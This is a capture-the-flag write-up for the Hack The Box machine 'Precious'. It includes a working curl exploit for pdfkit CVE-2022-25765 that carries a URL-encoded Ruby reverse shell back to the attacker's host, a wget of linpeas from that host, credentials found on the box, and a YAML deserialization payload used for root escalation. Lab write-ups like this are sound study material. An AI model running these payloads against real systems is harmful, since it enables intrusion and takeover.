Precious

TARGET IP: 10.10.11.189
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]

nmap -A -p 22,80 [Target IP]

HTTP
First start by adding the URL to the associated target IP Address by adding it to the hosts file.
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts



I tried adding a URL to see what happens but it looks like it does not have web access to view page.
I tried http://precious.htb/ and that still didn't work.
It does look like it will return credentials back depending on what you put in.
Enumeration
Gobuster
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt

Exploit
It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
Long story but I created different file extension payloads. It seems like the machine filters out
.php
and.rb
file extensions and will make a pdf file of any other file type I load into it.I did this by starting up a python web server on my host machine and plugging the URL into the input box on the web server and opening up a netcat listener to see if I could get something to stick.
I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.
JAVA
I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension
.xml
.
PDF
I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.
exiftool [PDF File Path]

It looks like the Creator's name is
pdfkit V0.8.6
Let's go take a look at how I can possibly exploit this.
CVE-2022-25765
Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
Set up a netcat listener
nc -lvnp 4444
I found a tool on
Github
that uses a curl command and forms a reverse shell that exploits the vulnerability.
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
Let's get a more interactive shell to work with.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
On host machine, reopen the terminal and ignore the echo.
stty raw -echo; fg
Let's go look for the user flag.
find / -name user.txt 2>/dev/null
Looks like the file is unreadable due to permissions. Let's see what we can do about that.
I now know we have at least 3 users on the system:
henry
ruby
root
We can confirm this in the
/ect/passwd
file.
I tired
sudo -l
but needed a password to use it. I also spent some time digging around to try find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.I used the same python web server I already had running.
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
I wasn't getting anywhere there so I started browsing around a bit more. in the directory
/home/ruby/.bundle/config
I found some juicy info.
Looks like possible credentials for henry.
henry:Q3c1AqGHtoI0aXAYFH
I'll now SSH into the machine with henry's credentials and it works.
ssh henry@[Target IP]
Now let's get that user file.
0d534cd692f6860abfeb9af4ba3c4e92
Next step is to see what priveleges I have as Henry.
sudo -l
We have sudo privileges to run the
update/dependencies.rb
file. If we cat that file we can see that it calls back to adependencies.yml
file.
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
With this information, we should be able to craft a new
dependencies.yml
file with malicious code that it will call back to as sudo.In the
/home/henry
directory we will create a newdependencies.yml
file and use this code snippet I got online.
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "chmod +s /bin/bash"
method_id: :resolve
You'll notice that the
git_set
is set tochmod +s /bin/bash
.This sets SUID to the that file which means we should be able to exploit it and escalate out privileges.
In the same directory that you created the
dependencies.yml
file, run the following:
sudo /usr/bin/ruby /opt/update_dependencies.rb
This will execute file and end up changing the
/bin/bash
file privileges.After this is done, we can use a privilege escalation technique from GTFOBins to escalate our privileges.
/bin/bash -p
Check to see who are with
whoami
and you should now be root.
cat /root/root.txt
7090f28f7bc0ffc0a8b3203bd45ff6ac
Last updated